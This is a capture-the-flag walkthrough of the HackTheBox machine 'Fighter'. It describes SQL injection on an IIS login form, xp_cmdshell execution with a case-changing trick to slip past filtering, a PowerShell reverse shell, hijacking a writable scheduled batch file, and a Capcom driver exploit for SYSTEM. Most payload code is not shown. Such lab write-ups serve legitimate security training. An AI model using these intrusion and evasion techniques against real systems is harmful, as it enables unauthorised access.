Fighter
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 4000 10.129.228.121
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-08 12:58 +08
Nmap scan report for 10.129.228.121
Host is up (0.0095s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open httpWith this, we can start proxying traffic through Burp.
Web Enumeration
Port 80 shows a Street Fighter themed page:
There's mention of a 'link' that we are supposed to know. Based on HTB trends, I added streetfighterclub.htb to the /etc/hosts file. Afterwards, I ran a gobuster directory and wfuzz subdomain scan on the site.
Interestingly, it just shows us a 403:
I noted that this is running Microsoft IIS based on the error. I still ran a gobuster scan on this new subdomain, and found one directory:
Based on this alone, we can run a feroxbuster recursive scan to find all the hidden subdirectories with the -x asp,html,aspx,php extensions.
We found a login page!
SQL Injection -> RCE
The login page looked quite vulnerable to some stuff:
Here's the POST request being sent back:
There was a logintype variable, where 1 indicated Administrator and 2 was for Users. Adding any quotes to it causes an Interval Server Error:
I tested this with some basic SQL Injection, and found that ;+--+- works! We are redirected to the Welcome.asp page instead.
So this login page was vulnerable to SQL Injection. I tested it a bit and found that there were 6 columns using UNION Injection:
I attempted to write webshells onto the site and run xp_cmdshell, since this may be a MSSQL server on the backend. All of them returned 500s, except for the reconfiguration to allow xp_cmdshell and execution of a ping command:
However, I got no ping back. In this case, there might be something blocking us on the website. I searched ways to obfuscate it, in case there was Defender or something blocking us, and this site had a pretty good way:
Just use XP_cmdshell instead of xp_cmdshell, and the ping would work:
Now, we just need to gain a reverse shell. Since there's something obviously blocking us on the machine, normal methods using nc.exe might not work. Oddly, running powershell.exe results in a 500, indicating that we might have to use the full PATH for it.
The 64-bit version of Powershell doesn't work oddly. I tried the 32-bit version located in C:\Windows\SysWOW64, and it worked properly:
The final query looks like this:
Take note to rename the shell to REV.PS1 since the web request sent is in caps for some reason. Afterwards, we would get a shell:
Privilege Escalation
Write Batch -> Decoder Shell
The box is a well patched machine:
There are 150+ hotfixes applied to this machine. There are other users on the machine too:
Interestingly, we can read the decoder user's home directory:
There's a batch file present that looks like its part of a scheduled task, and we have modify permissions on it:
Normally, I would append something to the end of the file and get it to execute, however, there's an exit call which would prevent me from exploiting that.
Normally we cannot overwrite the file without write permissions, but modify allows us to use copy to change the file.
Now, we can write anything we want to this file. We can echo in the same shell we used earlier:
After waiting for a while, we would get a decoder shell:
Driver Exploit -> SYSTEM
Basic enumeration of this user indicates that decoder has no special privileges over the machine. I couldn't run lots of scripts because AppLocker or Defender was present on the machine:
Based on the theme of the machine, I enumerated exploits related to Street Fighter and surprisingly, found an ExploitDB link:
Capcom driver is well-known for granting SYSTEM shells, so let's take a look at that. There are loads of PoCs available. I used this one:
The above was the best because it was based on Powershell instead of .exe files, which I could not seem to execute anyway. I struggled a bit here in uploading them onto the machine, but eventually resorted to using 0xdf's writeup to combine all of them (which is really smart):
Then, we can use the Powershell download cradle method to import it in memory:
Then, run the exploit:
Root.exe + DLL RE -> Flag
Within the administrator's desktop, there wasn't a root.txt flag. Instead, there was an .exe file with a .dll library.
The root.exe file required a password:
We can bring these back to our machine for reverse engineering to find that password. The files weren't that big, so I used base64 to encode it and then transfer it back to my machine:
Afterwards, I opened both in ghidra. root.exe had a function FUN_00401000 that performed some character stuff:
checkdll.dll had a function that XOR'd bytes with 9.
The global variable can be found here by clicking on it:
The encryption can be reversed easily by XOR-ing it with 9 and converting to characters.
Afterwards, we can get the password and pipe it to xxd to convert it to printable characters:
Then, we can get the flag:
Last updated